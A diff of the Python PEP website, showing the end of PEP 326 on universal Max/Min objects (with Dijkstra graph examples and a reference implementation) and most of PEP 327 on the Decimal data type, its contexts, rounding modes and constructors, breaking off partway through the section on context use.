+class NoneNode(SuperNode):
+    def __init__(self, node, parent=None, distance=None,
+                 visited=False):
+        SuperNode.__init__(self, node, parent, distance, visited)
+    def __cmp__(self, other):
+        pair = ((self.visited, self.distance),
+                (other.visited, other.distance))
+        if None in (self.distance, other.distance):
+            return -cmp(*pair)
+        return cmp(*pair)
+
+def DijkstraSP_table_node(graph, S, T, Node):
+    table = {}                                                 #3
+    for node in graph.iterkeys():
+        table[node] = Node(node)                               #1
+    table[S] = Node(S, distance=0)                             #2
+    cur = min(table.values())                                  #4a
+    sentinel = Node(None).distance
+    while not cur.visited and cur.distance != sentinel:        #4
+        cur.visited = True                                     #4b
+        for cdist, child in graph[cur.node]:                   #4c
+            ndist = cur.distance + cdist                       #|
+            if not table[child].visited and\                   #|
+               ndist < table[child].distance:                  #|
+                table[child].distance = ndist                  #|
+                table[child].parent = cur.node                 #|_
+        cur = min(table.values())                              #4a
+    if not table[T].visited:
+        return None
+    cur = T                                                    #5
+    path = [T]                                                 #|
+    while table[cur].parent is not None:                       #|
+        path.append(table[cur].parent)                         #|
+        cur = path[-1]                                         #|
+    path.reverse()                                             #|
+    return path                                                #|_
+
+
+

In the above, passing in either NoneNode or MaxNode would be +sufficient to use either None or Max for the node distance +‘infinity’. Note the additional special case required for None +being used as a sentinel in NoneNode in the __cmp__ method.

+

This example highlights the special case handling where None is +used as a sentinel value for maximum values “in the wild”, even though +None itself compares smaller than any other object in the standard +distribution.

+

As an aside, it is not clear to the author that using Nodes as a +replacement for tuples has increased readability significantly, if at +all.

+
+
+

A Min Example

+

An example of usage for Min is an algorithm that solves the +following problem [5]:

+
+
Suppose you are given a directed graph, representing a +communication network. The vertices are the nodes in the network, +and each edge is a communication channel. Each edge (u, v) has +an associated value r(u, v), with 0 <= r(u, v) <= 1, which +represents the reliability of the channel from u to v +(i.e., the probability that the channel from u to v will +not fail). Assume that the reliability probabilities of the +channels are independent. (This implies that the reliability of +any path is the product of the reliability of the edges along the +path.) Now suppose you are given two nodes in the graph, A +and B.
+

Such an algorithm is a 7 line modification to the DijkstraSP_table +algorithm given above (modified lines prefixed with *):

+
def DijkstraSP_table(graph, S, T):
+    table = {}                                                 #3
+    for node in graph.iterkeys():
+        #(visited, distance, node, parent)
+*       table[node] = (0, Min, node, None)                     #1
+*   table[S] = (0, 1, S, None)                                 #2
+*   cur = max(table.values())                                  #4a
+*   while (not cur[0]) and cur[1] > Min:                       #4
+        (visited, distance, node, parent) = cur
+        table[node] = (1, distance, node, parent)              #4b
+        for cdist, child in graph[node]:                       #4c
+*           ndist = distance*cdist                             #|
+*           if not table[child][0] and ndist > table[child][1]:#|
+                table[child] = (0, ndist, child, node)         #|_
+*       cur = max(table.values())                              #4a
+    if not table[T][0]:
+        return None
+    cur = T                                                    #5
+    path = [T]                                                 #|
+    while table[cur][3] is not None:                           #|
+        path.append(table[cur][3])                             #|
+        cur = path[-1]                                         #|
+    path.reverse()                                             #|
+    return path                                                #|_
+
+
+

Note that there is a way of translating the graph so that it can be passed unchanged into the original DijkstraSP_table algorithm. There also exists a handful of easy methods for constructing Node objects that would work with DijkstraSP_table_node. Such translations are left as an exercise to the reader.

+
+
+

Other Examples

+

Andrew P. Lentvorski, Jr. [6] has pointed out that various data structures involving range searching have immediate use for Max and Min values. More specifically: segment trees, range trees, k-d trees, and database keys:

+
+
…The issue is that a range can be open on one side and does not +always have an initialized case.

The solutions I have seen are to either overload None as the +extremum or use an arbitrary large magnitude number. Overloading +None means that the built-ins can’t really be used without special +case checks to work around the undefined (or “wrongly defined”) +ordering of None. These checks tend to swamp the nice performance +of built-ins like max() and min().

+

Choosing a large magnitude number throws away the ability of +Python to cope with arbitrarily large integers and introduces a +potential source of overrun/underrun bugs.

+
+

Further use examples of both Max and Min are available in the +realm of graph algorithms, range searching algorithms, computational +geometry algorithms, and others.

+
+
+

Independent Implementations?

+

Independent implementations of the Min/Max concept by users +desiring such functionality are not likely to be compatible, and +certainly will produce inconsistent orderings. The following examples +seek to show how inconsistent they can be.

+
  • Let us pretend we have created proper separate implementations of +MyMax, MyMin, YourMax and YourMin with the same code as given in +the sample implementation (with some minor renaming):
    >>> lst = [YourMin, MyMin, MyMin, YourMin, MyMax, YourMin, MyMax,
    +YourMax, MyMax]
    +>>> lst.sort()
    +>>> lst
    +[YourMin, YourMin, MyMin, MyMin, YourMin, MyMax, MyMax, YourMax,
    +MyMax]
    +
    +
    +

    Notice that while all the “Min”s are before the “Max”s, there is no +guarantee that all instances of YourMin will come before MyMin, the +reverse, or the equivalent MyMax and YourMax.

    +
  • The problem is also evident when using the heapq module:
    >>> lst = [YourMin, MyMin, MyMin, YourMin, MyMax, YourMin, MyMax,
    +YourMax, MyMax]
    +>>> heapq.heapify(lst)  #not needed, but it can't hurt
    +>>> while lst: print heapq.heappop(lst),
    +...
    +YourMin MyMin YourMin YourMin MyMin MyMax MyMax YourMax MyMax
    +
    +
    +
  • Furthermore, the findmin_Max code and both versions of Dijkstra could result in incorrect output by passing in secondary versions of Max.
+

It has been pointed out [7] that the reference implementation given +below would be incompatible with independent implementations of +Max/Min. The point of this PEP is for the introduction of +“The One True Implementation” of “The One True Maximum” and “The One +True Minimum”. User-based implementations of Max and Min +objects would thusly be discouraged, and use of “The One True +Implementation” would obviously be encouraged. Ambiguous behavior +resulting from mixing users’ implementations of Max and Min +with “The One True Implementation” should be easy to discover through +variable and/or source code introspection.

+
+
+
+

Reference Implementation

+
class _ExtremeType(object):
+
+    def __init__(self, cmpr, rep):
+        object.__init__(self)
+        self._cmpr = cmpr
+        self._rep = rep
+
+    def __cmp__(self, other):
+        if isinstance(other, self.__class__) and\
+           other._cmpr == self._cmpr:
+            return 0
+        return self._cmpr
+
+    def __repr__(self):
+        return self._rep
+
+Max = _ExtremeType(1, "Max")
+Min = _ExtremeType(-1, "Min")
+
+
+

Results of Test Run:

+
>>> max(Max, 2**65536)
+Max
+>>> min(Max, 2**65536)
+20035299304068464649790...
+(lines removed for brevity)
+...72339445587895905719156736L
+>>> min(Min, -2**65536)
+Min
+>>> max(Min, -2**65536)
+-2003529930406846464979...
+(lines removed for brevity)
+...072339445587895905719156736L
+
+
+
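
Note that the reference implementation relies on Python 2's __cmp__ protocol, which no longer exists in Python 3. A minimal modern sketch of the same idea (illustrative only, not part of the PEP) could use rich comparisons:

+
import functools
+
+@functools.total_ordering
+class _Extreme(object):
+    """Compares above everything (is_max=True) or below everything (is_max=False)."""
+    def __init__(self, is_max):
+        self._is_max = is_max
+    def __eq__(self, other):
+        return isinstance(other, _Extreme) and other._is_max == self._is_max
+    def __hash__(self):
+        return hash(self._is_max)
+    def __lt__(self, other):
+        # Min is less than everything except itself; Max is less than nothing.
+        return not self._is_max and self != other
+
+Max = _Extreme(True)
+Min = _Extreme(False)
+
+assert Min < -10**100 < 10**100 < Max
+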
+
+

Open Issues

+

As the PEP was rejected, all open issues are now closed and inconsequential. The module will use the names UniversalMaximum and UniversalMinimum, because it would be very difficult to mistake what each does. For those who require a shorter name, renaming the singletons during import is suggested:

+
from extremes import (UniversalMaximum as uMax,
+                     UniversalMinimum as uMin)
+
+
+
+
+

References

+ +
+
+

Changes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0326.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0327/index.html b/pep-0327/index.html new file mode 100644 index 00000000000..a155d314cfe --- /dev/null +++ b/pep-0327/index.html @@ -0,0 +1,1360 @@ + + + + + + + + PEP 327 – Decimal Data Type | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 327 – Decimal Data Type

+
+
Author:
+
Facundo Batista <facundo at taniquetil.com.ar>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
17-Oct-2003
+
Python-Version:
+
2.4
+
Post-History:
+
30-Nov-2003, 02-Jan-2004, 29-Jan-2004
+
+
+
+
Table of Contents +
+
+

Abstract

+

The idea is to have a Decimal data type, for every use where decimals +are needed but binary floating point is too inexact.

+

The Decimal data type will support the Python standard functions and +operations, and must comply with the decimal arithmetic ANSI standard +X3.274-1996 [1].

+

Decimal will be floating point (as opposed to fixed point) and will +have bounded precision (the precision is the upper limit on the +number of significant digits in a result). However, precision is +user-settable, and a notion of significant trailing zeroes is supported +so that fixed-point usage is also possible.

+

This work is based on code and test functions written by Eric Price, +Aahz and Tim Peters. Just before Python 2.4a1, the decimal.py +reference implementation was moved into the standard library; along +with the documentation and the test suite, this was the work of +Raymond Hettinger. Much of the explanation in this PEP is taken from +Cowlishaw’s work [2], comp.lang.python and python-dev.

+
+
+

Motivation

+

Here I’ll set out the reasons why I think a Decimal data type is needed and why other numeric data types are not enough.

+

I wanted a Money data type, and after proposing a pre-PEP in +comp.lang.python, the community agreed to have a numeric data type +with the needed arithmetic behaviour, and then build Money over it: +all the considerations about quantity of digits after the decimal +point, rounding, etc., will be handled through Money. It is not the +purpose of this PEP to have a data type that can be used as Money +without further effort.

+

One of the biggest advantages of implementing a standard is that someone already thought out all the creepy cases for you. And GvR redirected me to a standard: Mike Cowlishaw’s General Decimal Arithmetic specification [2]. This document defines a general purpose decimal arithmetic. A correct implementation of this specification will conform to the decimal arithmetic defined in ANSI/IEEE standard 854-1987, except for some minor restrictions, and will also provide unrounded decimal arithmetic and integer arithmetic as proper subsets.

+
+

The problem with binary float

+

In decimal math, there are many numbers that can’t be represented with a fixed number of decimal digits, e.g. 1/3 = 0.3333333333…

+

In base 2 (the way that standard floating point is calculated), 1/2 = +0.1, 1/4 = 0.01, 1/8 = 0.001, etc. Decimal 0.2 equals 2/10 equals +1/5, resulting in the binary fractional number +0.001100110011001… As you can see, the problem is that some decimal +numbers can’t be represented exactly in binary, resulting in small +roundoff errors.

+

So we need a data type that represents decimal numbers exactly. Instead of a binary data type, we need a decimal one.

+
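
A two-line demonstration, using the decimal module as it eventually shipped in Python 2.4:

+
>>> 0.1 + 0.2 == 0.3                  # binary float accumulates roundoff
+False
+>>> from decimal import Decimal
+>>> Decimal("0.1") + Decimal("0.2") == Decimal("0.3")
+True
+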
+
+

Why floating point?

+

So we go to decimal, but why floating point?

+

Floating point numbers use a fixed quantity of digits (precision) to +represent a number, working with an exponent when the number gets too +big or too small. For example, with a precision of 5:

+
  1234 ==>   1234e0
+ 12345 ==>  12345e0
+123456 ==>  12346e1
+
+
+

(note that in the last line the number got rounded to fit in five digits).

+

In contrast, we have the example of a long integer with infinite +precision, meaning that you can have the number as big as you want, +and you’ll never lose any information.

+

In a fixed point number, the position of the decimal point is fixed. For a fixed point data type, check Tim Peters’ FixedPoint at SourceForge [4]. I’ll go for floating point because it’s easier to implement the arithmetic behaviour of the standard, and then you can implement a fixed point data type over Decimal.

+

But why can’t we have a floating point number with infinite precision? It’s not so easy, because of inexact divisions. E.g.: 1/3 = 0.3333333333333… ad infinitum. In this case you would have to store an infinite number of 3s, which takes too much memory ;).

+

John Roth proposed to eliminate the division operator and force the +user to use an explicit method, just to avoid this kind of trouble. +This generated adverse reactions in comp.lang.python, as everybody +wants to have support for the / operator in a numeric data type.

+

With all this said, maybe you’re thinking “Hey! Can we just store the 1 and the 3 as numerator and denominator?”, which takes us to the next point.

+
+
+

Why not rational?

+

Rational numbers are stored using two integer numbers, the numerator +and the denominator. This implies that the arithmetic operations +can’t be executed directly (e.g. to add two rational numbers you first +need to calculate the common denominator).

+

Quoting Alex Martelli:

+
+
The performance implications of the fact that summing two +rationals (which take O(M) and O(N) space respectively) gives a +rational which takes O(M+N) memory space is just too troublesome. +There are excellent Rational implementations in both pure Python +and as extensions (e.g., gmpy), but they’ll always be a “niche +market” IMHO. Probably worth PEPping, not worth doing without +Decimal – which is the right way to represent sums of money, a +truly major use case in the real world.
+

Anyway, if you’re interested in this data type, you may want to take a look at PEP 239: Adding a Rational Type to Python.

+
+
+

So, what do we have?

+

The result is a Decimal data type, with bounded precision and floating +point.

+

Will it be useful? I can’t say it better than Alex Martelli:

+
+
Python (out of the box) doesn’t let you have binary floating point +numbers with whatever precision you specify: you’re limited to +what your hardware supplies. Decimal, be it used as a fixed or +floating point number, should suffer from no such limitation: +whatever bounded precision you may specify on number creation +(your memory permitting) should work just as well. Most of the +expense of programming simplicity can be hidden from application +programs and placed in a suitable decimal arithmetic type. As per +http://speleotrove.com/decimal/, a single data type can be +used for integer, fixed-point, and floating-point decimal +arithmetic – and for money arithmetic which doesn’t drive the +application programmer crazy.
+

There are several uses for such a data type. As I said before, I will +use it as base for Money. In this case the bounded precision is not +an issue; quoting Tim Peters:

+
+
A precision of 20 would be way more than enough to account for +total world economic output, down to the penny, since the +beginning of time.
+
+
+
+

General Decimal Arithmetic Specification

+

Here I’ll include information and descriptions that are part of the +specification [2] (the structure of the number, the context, etc.). +All the requirements included in this section are not for discussion +(barring typos or other mistakes), as they are in the standard, and +the PEP is just for implementing the standard.

+

Because of copyright restrictions, I can not copy here explanations +taken from the specification, so I’ll try to explain it in my own +words. I firmly encourage you to read the original specification +document [2] for details or if you have any doubt.

+
+

The Arithmetic Model

+

The specification is based on a decimal arithmetic model, as defined +by the relevant standards: IEEE 854 [3], ANSI X3-274 [1], and the +proposed revision [5] of IEEE 754 [6].

+

The model has three components:

+
  • Numbers: just the values that the operation uses as input or output.
  • Operations: addition, multiplication, etc.
  • Context: a set of parameters and rules that the user can select and which govern the results of operations (for example, the precision to be used).
+
+
+

Numbers

+

Numbers may be finite or special values. The former can be represented exactly. The latter are infinities and undefined values (such as 0/0).

+

Finite numbers are defined by three parameters:

+
  • Sign: 0 (positive) or 1 (negative).
  • Coefficient: a non-negative integer.
  • Exponent: a signed integer, the power of ten of the coefficient multiplier.
+

The numerical value of a finite number is given by:

+
(-1)**sign * coefficient * 10**exponent
+
+
+

Special values are named as following:

+
  • Infinity: a value which is infinitely large. Could be positive or negative.
  • Quiet NaN (“qNaN”): represents undefined results (Not a Number). Does not cause an Invalid operation condition. The sign in a NaN has no meaning.
  • Signaling NaN (“sNaN”): also Not a Number, but will cause an Invalid operation condition if used in any operation.
+
+
+

Context

+

The context is a set of parameters and rules that the user can select +and which govern the results of operations (for example, the precision +to be used).

+

The context gets that name because it surrounds the Decimal numbers, +with parts of context acting as input to, and output of, operations. +It’s up to the application to work with one or several contexts, +but definitely the idea is not to get a context per Decimal number. +For example, a typical use would be to set the context’s precision to +20 digits at the start of a program, and never explicitly use context +again.

+

These definitions don’t affect the internal storage of the Decimal +numbers, just the way that the arithmetic operations are performed.

+

The context is mainly defined by the following parameters (see +Context Attributes for all context attributes):

+
  • Precision: the maximum number of significant digits that can result from an arithmetic operation (integer > 0). There is no maximum for this value.
  • Rounding: the name of the algorithm to be used when rounding is necessary, one of “round-down”, “round-half-up”, “round-half-even”, “round-ceiling”, “round-floor”, “round-half-down”, and “round-up”. See Rounding Algorithms below.
  • Flags and trap-enablers: exceptional conditions are grouped into signals, controllable individually, each consisting of a flag (boolean, set when the signal occurs) and a trap-enabler (a boolean that controls behavior). The signals are: “clamped”, “division-by-zero”, “inexact”, “invalid-operation”, “overflow”, “rounded”, “subnormal” and “underflow”.
+
+
+

Default Contexts

+

The specification defines two default contexts, which should be easily +selectable by the user.

+

Basic Default Context:

+
  • flags: all set to 0
  • trap-enablers: inexact, rounded, and subnormal are set to 0; all others are set to 1
  • precision: is set to 9
  • rounding: is set to round-half-up
+

Extended Default Context:

+
  • flags: all set to 0
  • trap-enablers: all set to 0
  • precision: is set to 9
  • rounding: is set to round-half-even
+
+
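
In the decimal module as it shipped, these two defaults are exposed as decimal.BasicContext and decimal.ExtendedContext:

+
>>> import decimal
+>>> decimal.BasicContext.prec
+9
+>>> decimal.BasicContext.rounding
+'ROUND_HALF_UP'
+>>> decimal.ExtendedContext.rounding
+'ROUND_HALF_EVEN'
+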
+

Exceptional Conditions

+

The table below lists the exceptional conditions that may arise during +the arithmetic operations, the corresponding signal, and the defined +result. For details, see the specification [2].

+
Condition           Signal              Result
-----------------   -----------------   --------------------------------------
Clamped             clamped             see spec [2]
Division by zero    division-by-zero    [sign,inf]
Inexact             inexact             unchanged
Invalid operation   invalid-operation   [0,qNaN] (or [s,qNaN] or [s,qNaN,d]
                                        when the cause is a signaling NaN)
Overflow            overflow            depends on the rounding mode
Rounded             rounded             unchanged
Subnormal           subnormal           unchanged
Underflow           underflow           see spec [2]
+

Note: when the standard talks about “Insufficient storage”, since this is implementation-specific behaviour about not having enough storage to keep the internals of the number, this implementation will raise MemoryError.

+

Regarding Overflow and Underflow, there’s been a long discussion in +python-dev about artificial limits. The general consensus is to keep +the artificial limits only if there are important reasons to do that. +Tim Peters gives us three:

+
+
…eliminating bounds on exponents effectively means overflow +(and underflow) can never happen. But overflow is a valuable +safety net in real life fp use, like a canary in a coal mine, +giving danger signs early when a program goes insane.

Virtually all implementations of 854 use (and as IBM’s standard +even suggests) “forbidden” exponent values to encode non-finite +numbers (infinities and NaNs). A bounded exponent can do this at +virtually no extra storage cost. If the exponent is unbounded, +then additional bits have to be used instead. This cost remains +hidden until more time- and space- efficient implementations are +attempted.

+

Big as it is, the IBM standard is a tiny start at supplying a +complete numeric facility. Having no bound on exponent size will +enormously complicate the implementations of, e.g., decimal sin() +and cos() (there’s then no a priori limit on how many digits of +pi effectively need to be known in order to perform argument +reduction).

+
+

Edward Loper gives us an example of when the limits are to be crossed: probabilities.

+

That said, Robert Brewer and Andrew Lentvorski want the limits to be +easily modifiable by the users. Actually, this is quite possible:

+
>>> d1 = Decimal("1e999999999")     # at the exponent limit
+>>> d1
+Decimal("1E+999999999")
+>>> d1 * 10                         # exceed the limit, got infinity
+Traceback (most recent call last):
+  File "<pyshell#3>", line 1, in ?
+    d1 * 10
+  ...
+  ...
+Overflow: above Emax
+>>> getcontext().Emax = 1000000000  # increase the limit
+>>> d1 * 10                         # does not exceed any more
+Decimal("1.0E+1000000000")
+>>> d1 * 100                        # exceed again
+Traceback (most recent call last):
+  File "<pyshell#3>", line 1, in ?
+    d1 * 100
+  ...
+  ...
+Overflow: above Emax
+
+
+
+
+

Rounding Algorithms

+

round-down: The discarded digits are ignored; the result is +unchanged (round toward 0, truncate):

+
1.123 --> 1.12
+1.128 --> 1.12
+1.125 --> 1.12
+1.135 --> 1.13
+
+
+

round-half-up: If the discarded digits represent greater than or +equal to half (0.5) then the result should be incremented by 1; +otherwise the discarded digits are ignored:

+
1.123 --> 1.12
+1.128 --> 1.13
+1.125 --> 1.13
+1.135 --> 1.14
+
+
+

round-half-even: If the discarded digits represent greater than +half (0.5) then the result coefficient is incremented by 1; if they +represent less than half, then the result is not adjusted; otherwise +the result is unaltered if its rightmost digit is even, or incremented +by 1 if its rightmost digit is odd (to make an even digit):

+
1.123 --> 1.12
+1.128 --> 1.13
+1.125 --> 1.12
+1.135 --> 1.14
+
+
+

round-ceiling: If all of the discarded digits are zero or if the +sign is negative the result is unchanged; otherwise, the result is +incremented by 1 (round toward positive infinity):

+
 1.123 -->  1.13
+ 1.128 -->  1.13
+-1.123 --> -1.12
+-1.128 --> -1.12
+
+
+

round-floor: If all of the discarded digits are zero or if the +sign is positive the result is unchanged; otherwise, the absolute +value of the result is incremented by 1 (round toward negative +infinity):

+
 1.123 -->  1.12
+ 1.128 -->  1.12
+-1.123 --> -1.13
+-1.128 --> -1.13
+
+
+

round-half-down: If the discarded digits represent greater than +half (0.5) then the result is incremented by 1; otherwise the +discarded digits are ignored:

+
1.123 --> 1.12
+1.128 --> 1.13
+1.125 --> 1.12
+1.135 --> 1.13
+
+
+

round-up: If all of the discarded digits are zero the result is +unchanged, otherwise the result is incremented by 1 (round away from +0):

+
1.123 --> 1.13
+1.128 --> 1.13
+1.125 --> 1.13
+1.135 --> 1.14
+
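
Two of the rows above can be checked against the decimal module’s quantize() method (module behaviour, not part of this PEP’s text):

+
>>> from decimal import Decimal, ROUND_HALF_UP, ROUND_HALF_EVEN
+>>> Decimal("1.125").quantize(Decimal("0.01"), rounding=ROUND_HALF_UP)
+Decimal('1.13')
+>>> Decimal("1.125").quantize(Decimal("0.01"), rounding=ROUND_HALF_EVEN)
+Decimal('1.12')
+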
+
+
+
+
+

Rationale

+

I must separate the requirements into two sections. The first is to comply with the ANSI standard. All the requirements for this are specified in Mike Cowlishaw’s work [2]. He also provided a very large suite of test cases.

+

The second section of requirements (standard Python functions support, +usability, etc.) is detailed from here, where I’ll include all the +decisions made and why, and all the subjects still being discussed.

+
+

Explicit construction

+

The explicit construction does not get affected by the context (there +is no rounding, no limits by the precision, etc.), because the context +affects just operations’ results. The only exception to this is when +you’re Creating from Context.

+
+

From int or long

+

There’s no loss and no need to specify any other information:

+
Decimal(35)
+Decimal(-124)
+
+
+
+
+

From string

+

Strings containing Python decimal integer literals and Python float +literals will be supported. In this transformation there is no loss +of information, as the string is directly converted to Decimal (there +is not an intermediate conversion through float):

+
Decimal("-12")
+Decimal("23.2e-7")
+
+
+

Also, you can construct in this way all special values (Infinity and +Not a Number):

+
Decimal("Inf")
+Decimal("NaN")
+
+
+
+
+

From float

+

The initial discussion on this item was what should +happen when passing floating point to the constructor:

+
  1. Decimal(1.1) == Decimal('1.1')
  2. Decimal(1.1) == Decimal('110000000000000008881784197001252...e-51')
  3. an exception is raised
+

Several people alleged that (1) is the better option here, because +it’s what you expect when writing Decimal(1.1). And quoting John +Roth, it’s easy to implement:

+
+
It’s not at all difficult to find where the actual number ends and +where the fuzz begins. You can do it visually, and the algorithms +to do it are quite well known.
+

But if I really want my number to be Decimal('110000000000000008881784197001252...e-51'), why can’t I write Decimal(1.1)? Why should I expect Decimal to be “rounding” it? Remember that 1.1 is binary floating point, so I can predict the result. It’s not intuitive to a beginner, but that’s the way it is.

+

Anyway, Paul Moore showed that (1) can’t work, because:

+
(1) says  D(1.1) == D('1.1')
+but       1.1 == 1.1000000000000001
+so        D(1.1) == D(1.1000000000000001)
+together: D(1.1000000000000001) == D('1.1')
+
+
+

which is wrong, because if I write Decimal('1.1') it is exact, not +D(1.1000000000000001). He also proposed to have an explicit +conversion to float. bokr says you need to put the precision in the +constructor and mwilson agreed:

+
d = Decimal (1.1, 1)  # take float value to 1 decimal place
+d = Decimal (1.1)  # gets `places` from pre-set context
+
+
+

But Alex Martelli says that:

+
+
Constructing with some specified precision would be fine. Thus, +I think “construction from float with some default precision” runs +a substantial risk of tricking naive users.
+

So, the accepted solution through c.l.p is that you cannot call Decimal with a float. Instead you must use a method: Decimal.from_float(). The syntax:

+
Decimal.from_float(floatNumber, [decimal_places])
+
+
+

where floatNumber is the float number from which the construction originates, and decimal_places is the number of digits after the decimal point to which you apply a round-half-up rounding, if any. In this way you can do, for example:

+
Decimal.from_float(1.1, 2): The same as doing Decimal('1.1').
+Decimal.from_float(1.1, 16): The same as doing Decimal('1.1000000000000001').
+Decimal.from_float(1.1): The same as doing Decimal('1100000000000000088817841970012523233890533447265625e-51').
+
+
+

Based on later discussions, it was decided to omit from_float() from the +API for Py2.4. Several ideas contributed to the thought process:

+
  • Interactions between decimal and binary floating point force the user to deal with tricky issues of representation and round-off. Avoidance of those issues is a primary reason for having the module in the first place.
  • The first release of the module should focus on that which is safe, minimal, and essential.
  • While theoretically nice, real world use cases for interactions between floats and decimals are lacking. Java included float/decimal conversions to handle an obscure case where calculations are best performed in decimal even though a legacy data structure requires the inputs and outputs to be stored in binary floating point.
  • If the need arises, users can use string representations as an intermediate type. The advantage of this approach is that it makes explicit the assumptions about precision and representation (no wondering what is going on under the hood).
  • The Java docs for BigDecimal(double val) reflected their experiences with the constructor: “The results of this constructor can be somewhat unpredictable and its use is generally not recommended.”
+
+
+
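
As a historical footnote to the list above: a Decimal.from_float() classmethod did eventually land (in Python 2.7 and 3.1), and it performs the exact conversion, with no decimal_places argument:

+
>>> from decimal import Decimal
+>>> Decimal.from_float(1.1)
+Decimal('1.100000000000000088817841970012523233890533447265625')
+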

From tuples

+

Aahz suggested constructing from tuples: it’s easier to implement eval()’s round trip, and “someone who has numeric values representing a Decimal does not need to convert them to a string.”

+

The structure will be a tuple of three elements: sign, number and +exponent. The sign is 1 or 0, the number is a tuple of decimal digits +and the exponent is a signed int or long:

+
Decimal((1, (3, 2, 2, 5), -2))     # for -32.25
+
+
+

Of course, you can construct in this way all special values:

+
Decimal( (0, (0,), 'F') )          # for Infinity
+Decimal( (0, (0,), 'n') )          # for Not a Number
+
+
+
+
+

From Decimal

+

No mystery here, just a copy.

+
+
+

Syntax for All Cases

+
Decimal(value1)
+Decimal.from_float(value2, [decimal_places])
+
+
+

where value1 can be int, long, string, 3-tuple or Decimal, value2 can only be float, and decimal_places is an optional non-negative int.

+
+
+

Creating from Context

+

This item arose in python-dev from two sources in parallel. Ka-Ping +Yee proposes to pass the context as an argument at instance creation +(he wants the context he passes to be used only in creation time: “It +would not be persistent”). Tony Meyer asks from_string to honor the +context if it receives a parameter “honour_context” with a True value. +(I don’t like it, because the doc specifies that the context be +honored and I don’t want the method to comply with the specification +regarding the value of an argument.)

+

Tim Peters gives us a reason to have a creation that uses context:

+
+
In general number-crunching, literals may be given to high +precision, but that precision isn’t free and usually isn’t +needed
+

Casey Duncan wants to use another method, not a bool arg:

+
+
I find boolean arguments a general anti-pattern, especially given +we have class methods. Why not use an alternate constructor like +Decimal.rounded_to_context(“3.14159265”).
+

In the process of deciding the syntax of that, Tim came up with a +better idea: he proposes not to have a method in Decimal to create +with a different context, but having instead a method in Context to +create a Decimal instance. Basically, instead of:

+
D.using_context(number, context)
+
+
+

it will be:

+
context.create_decimal(number)
+
+
+

From Tim:

+
+
While all operations in the spec except for the two to-string +operations use context, no operations in the spec support an +optional local context. That the Decimal() constructor ignores +context by default is an extension to the spec. We must supply a +context-honoring from-string operation to meet the spec. I +recommend against any concept of “local context” in any operation +– it complicates the model and isn’t necessary.
+

So, we decided to use a context method to create a Decimal that will use that particular context only at creation time (for further operations it will use the context of the thread). But, a method with what name?

+

Tim Peters proposes three methods to create from diverse sources +(from_string, from_int, from_float). I proposed to use one method, +create_decimal(), without caring about the data type. Michael +Chermside: “The name just fits my brain. The fact that it uses the +context is obvious from the fact that it’s Context method”.

+

The community agreed with that. I think that it’s OK because a newbie +will not be using the creation method from Context (the separate +method in Decimal to construct from float is just to prevent newbies +from encountering binary floating point issues).

+

So, in short, if you want to create a Decimal instance using a +particular context (that will be used just at creation time and not +any further), you’ll have to use a method of that context:

+
# n is any datatype accepted in Decimal(n) plus float
+mycontext.create_decimal(n)
+
+
+

Example:

+
>>> # create a standard decimal instance
+>>> Decimal("11.2233445566778899")
+Decimal("11.2233445566778899")
+>>>
+>>> # create a decimal instance using the thread context
+>>> thread_context = getcontext()
+>>> thread_context.prec
+28
+>>> thread_context.create_decimal("11.2233445566778899")
+Decimal("11.2233445566778899")
+>>>
+>>> # create a decimal instance using other context
+>>> other_context = thread_context.copy()
+>>> other_context.prec = 4
+>>> other_context.create_decimal("11.2233445566778899")
+Decimal("11.22")
+
+
+
+
+
+

Implicit construction

+

As the implicit construction is the consequence of an operation, it +will be affected by the context as is detailed in each point.

+

John Roth suggested that “The other type should be handled in the same +way the decimal() constructor would handle it”. But Alex Martelli +thinks that

+
+
this total breach with Python tradition would be a terrible +mistake. 23+”43” is NOT handled in the same way as 23+int(“45”), +and a VERY good thing that is too. It’s a completely different +thing for a user to EXPLICITLY indicate they want construction +(conversion) and to just happen to sum two objects one of which by +mistake could be a string.
+

So, here I define the behaviour again for each data type.

+
+

From int or long

+

An int or long is treated like a Decimal explicitly constructed from Decimal(str(x)) in the current context (meaning that the to-string rules for rounding are applied and the appropriate flags are set). This guarantees that expressions like Decimal('1234567') + 13579 match the mental model of Decimal('1234567') + Decimal('13579'). That model works because all integers are representable as strings without representation error.

+
+
+
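For instance, a quick sketch of that equivalence (doctest-style; it assumes the released decimal module with its default ROUND_HALF_EVEN rounding):

>>> from decimal import Decimal, getcontext
>>> getcontext().prec = 6
>>> Decimal('1234567') + 13579
Decimal('1.24815E+6')
>>> Decimal('1234567') + Decimal('13579')
Decimal('1.24815E+6')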

From string

+

Everybody agrees to raise an exception here.

+
+
+

From float

+

Aahz is strongly opposed to interacting with float, suggesting an explicit conversion:

+
+
The problem is that Decimal is capable of greater precision, +accuracy, and range than float.
+

The example of the valid Python expression, 35 + 1.1, seems to suggest that Decimal(35) + 1.1 should also be valid. However, a closer look shows that it only demonstrates the feasibility of integer to floating point conversions. Hence, the correct analog for decimal floating point is 35 + Decimal(1.1). Both coercions, int-to-float and int-to-Decimal, can be done without incurring representation error.

+

The question of how to coerce between binary and decimal floating point is more complex. I proposed allowing the interaction with float, making an exact conversion and raising ValueError if it exceeds the precision in the current context (this is maybe too tricky, because for example with a precision of 9, Decimal(35) + 1.2 is OK but Decimal(35) + 1.1 raises an error).

+

This proved to be too tricky. So tricky, in fact, that c.l.p agreed to raise TypeError in this case: you cannot mix Decimal and float.
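The agreed behaviour is easy to show (a sketch; the exact exception message, elided here, varies between versions):

>>> from decimal import Decimal
>>> Decimal('35') + 1.1
Traceback (most recent call last):
  ...
TypeError: unsupported operand type(s) for +: ...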

+
+
+

From Decimal

+

There isn’t any issue here.

+
+
+
+

Use of Context

+

In the last pre-PEP I said that “The Context must be omnipresent, +meaning that changes to it affects all the current and future Decimal +instances”. I was wrong. In response, John Roth said:

+
+
The context should be selectable for the particular usage. That +is, it should be possible to have several different contexts in +play at one time in an application.
+

In comp.lang.python, Aahz explained that the idea is to have a “context per thread”. So, all the instances of a thread belong to a context, and you can change the context in thread A (and the behaviour of the instances of that thread) without changing anything in thread B.

+

Also, and again correcting me, he said:

+
+
